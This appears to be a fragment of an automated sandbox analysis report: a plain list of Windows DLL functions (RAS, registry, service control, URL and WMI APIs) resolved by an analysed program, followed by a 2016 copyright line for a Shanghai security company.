ntdll.dll.RtlDllShutdownInProgress
comctl32.dll.#329
ole32.dll.OleUninitialize
ole32.dll.CoRevokeInitializeSpy
comctl32.dll.#388
oleaut32.dll.#500
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdi32.dll.GetLayout
gdi32.dll.GdiRealizationInfo
gdi32.dll.FontIsLinked
advapi32.dll.RegQueryInfoKeyW
gdi32.dll.GetTextFaceAliasW
advapi32.dll.RegEnumValueW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegQueryValueExA
advapi32.dll.RegEnumKeyExW
rasapi32.dll.RasConnectionNotificationW
rasman.dll.RasPortClearStatistics
rasman.dll.RasBundleClearStatistics
rasman.dll.RasBundleClearStatisticsEx
rasman.dll.RasDeviceEnum
rasman.dll.RasDeviceGetInfo
rasman.dll.RasFreeBuffer
rasman.dll.RasGetBuffer
rasman.dll.RasGetInfo
rasman.dll.RasGetDialMachineEventContext
rasman.dll.RasSetDialMachineEventHandle
rasman.dll.RasGetNdiswanDriverCaps
rasman.dll.RasInitialize
rasman.dll.RasInitializeNoWait
rasman.dll.RasPortCancelReceive
rasman.dll.RasPortEnum
rasman.dll.RasPortGetInfo
rasman.dll.RasPortGetFramingEx
rasman.dll.RasPortGetStatistics
rasman.dll.RasBundleGetStatistics
rasman.dll.RasPortGetStatisticsEx
rasman.dll.RasBundleGetStatisticsEx
rasman.dll.RasPortReceive
rasman.dll.RasPortReceiveEx
rasman.dll.RasPortSend
rasman.dll.RasPortGetBundle
rasman.dll.RasGetDevConfig
rasman.dll.RasGetDevConfigEx
rasman.dll.RasSetDevConfig
rasman.dll.RasPortClose
rasman.dll.RasPortListen
rasman.dll.RasPortConnectComplete
rasman.dll.RasPortDisconnect
rasman.dll.RasRequestNotification
rasman.dll.RasPortEnumProtocols
rasman.dll.RasPortSetFraming
rasman.dll.RasPortSetFramingEx
rasman.dll.RasSetCachedCredentials
rasman.dll.RasGetDialParams
rasman.dll.RasSetDialParams
rasman.dll.RasCreateConnection
rasman.dll.RasDestroyConnection
rasman.dll.RasConnectionEnum
rasman.dll.RasAddConnectionPort
rasman.dll.RasEnumConnectionPorts
rasman.dll.RasGetConnectionParams
rasman.dll.RasSetConnectionParams
rasman.dll.RasGetConnectionUserData
rasman.dll.RasSetConnectionUserData
rasman.dll.RasGetPortUserData
rasman.dll.RasSetPortUserData
rasman.dll.RasAddNotification
rasman.dll.RasSignalNewConnection
rasman.dll.RasApplyPostConnectActions
rasman.dll.RasProtocolStop
rasman.dll.RasProtocolCallback
rasman.dll.RasProtocolChangePassword
rasman.dll.RasProtocolGetInfo
rasman.dll.RasProtocolRetry
rasman.dll.RasProtocolStart
rasman.dll.RasPortOpen
rasman.dll.RasAllocateRoute
rasman.dll.RasActivateRoute
rasman.dll.RasActivateRouteEx
rasman.dll.RasDeviceSetInfo
rasman.dll.RasDeviceSetInfoSafe
rasman.dll.RasDeviceConnect
rasman.dll.RasPortSetInfo
rasman.dll.RasSendProtocolResultToRasman
rasman.dll.RasSetEapInfo
rasman.dll.RasRpcConnect
rasman.dll.RasRpcDisconnect
rasman.dll.RasGetNumPortOpen
rasman.dll.RasRefConnection
rasman.dll.RasSetEapUIData
rasman.dll.RasGetEapUIData
rasman.dll.RasFindPrerequisiteEntry
rasman.dll.RasPortOpenEx
rasman.dll.RasLinkGetStatistics
rasman.dll.RasConnectionGetStatistics
rasman.dll.RasGetHportFromConnection
rasman.dll.RasRPCBind
rasman.dll.RasReferenceCustomCount
rasman.dll.RasGetHConnFromEntry
rasman.dll.RasGetDeviceName
rasman.dll.RasEnableIpSec
rasman.dll.RasSetTunnelEndPoints
rasman.dll.RasStartRasAutoIfRequired
rasman.dll.RasStartProtocolRenegotiation
rasman.dll.RasSendNotification
rasman.dll.RasGetDeviceNameW
rasman.dll.RasGetUnicodeDeviceName
rasman.dll.RasRpcGetVersion
rasman.dll.RasRpcPortEnum
rasman.dll.RasRpcDeviceEnum
rasman.dll.RasRpcGetDevConfig
rasman.dll.RasRpcPortGetInfo
rasman.dll.RasRpcGetInstalledProtocols
rasman.dll.RasRpcGetInstalledProtocolsEx
rasman.dll.RasRpcGetSystemDirectory
rasman.dll.RasRpcGetUserPreferences
rasman.dll.RasRpcDeleteEntry
rasman.dll.RasRpcEnumConnections
rasman.dll.RasRpcGetCountryInfo
rasman.dll.RasRpcGetErrorString
rasman.dll.RasRpcSetUserPreferences
rasman.dll.RasProtocolUpdateConnection
rasman.dll.RasAddNotificationEx
rasman.dll.RasRemoveNotificationEx
rasman.dll.RasGetNotificationEntry
rasman.dll.RasSignalMonitorThreadExit
rasman.dll.RasmanUninitialize
rtutils.dll.TraceRegisterExA
rtutils.dll.TracePrintfExA
sechost.dll.OpenSCManagerA
sechost.dll.OpenServiceA
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
napinsp.dll.NSPStartup
sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
pnrpnsp.dll.NSPStartup
mswsock.dll.NSPStartup
winrnr.dll.NSPStartup
ws2_32.dll.#112
ws2_32.dll.#111
dnsapi.dll.DnsApiAlloc
dnsapi.dll.DnsApiFree
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
ole32.dll.StringFromIID
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
oleaut32.dll.#10
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.SetConsoleInputExeNameW
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
urlmon.dll.DllCanUnloadNow
urlmon.dll.IEDllLoader
urlmon.dll.CoInternetCreateZoneManager
urlmon.dll.CoInternetGetSession
urlmon.dll.CopyBindInfo
urlmon.dll.CreateURLMoniker
urlmon.dll.RegisterBindStatusCallback
urlmon.dll.ReleaseBindInfo
urlmon.dll.RevokeBindStatusCallback
urlmon.dll.UrlMkGetSessionOption
urlmon.dll.CoInternetCreateSecurityManager
urlmon.dll.CoInternetCombineUrl
urlmon.dll.CoInternetGetSecurityUrl
urlmon.dll.IsValidURL
wininet.dll.InternetCrackUrlW
wininet.dll.InternetCreateUrlW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.CoGetPSClsid
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
kernel32.dll.FindActCtxSectionStringW
msoxmlmf.dll.DllGetClassObject
msoxmlmf.dll.DllCanUnloadNow
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.GetLocaleInfoEx
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
oleaut32.dll.#283
oleaut32.dll.#284
kernel32.dll.RegOpenKeyExW
ntdll.dll.EtwUnregisterTraceGuids
©2016 上海魔盾信息科技有限公司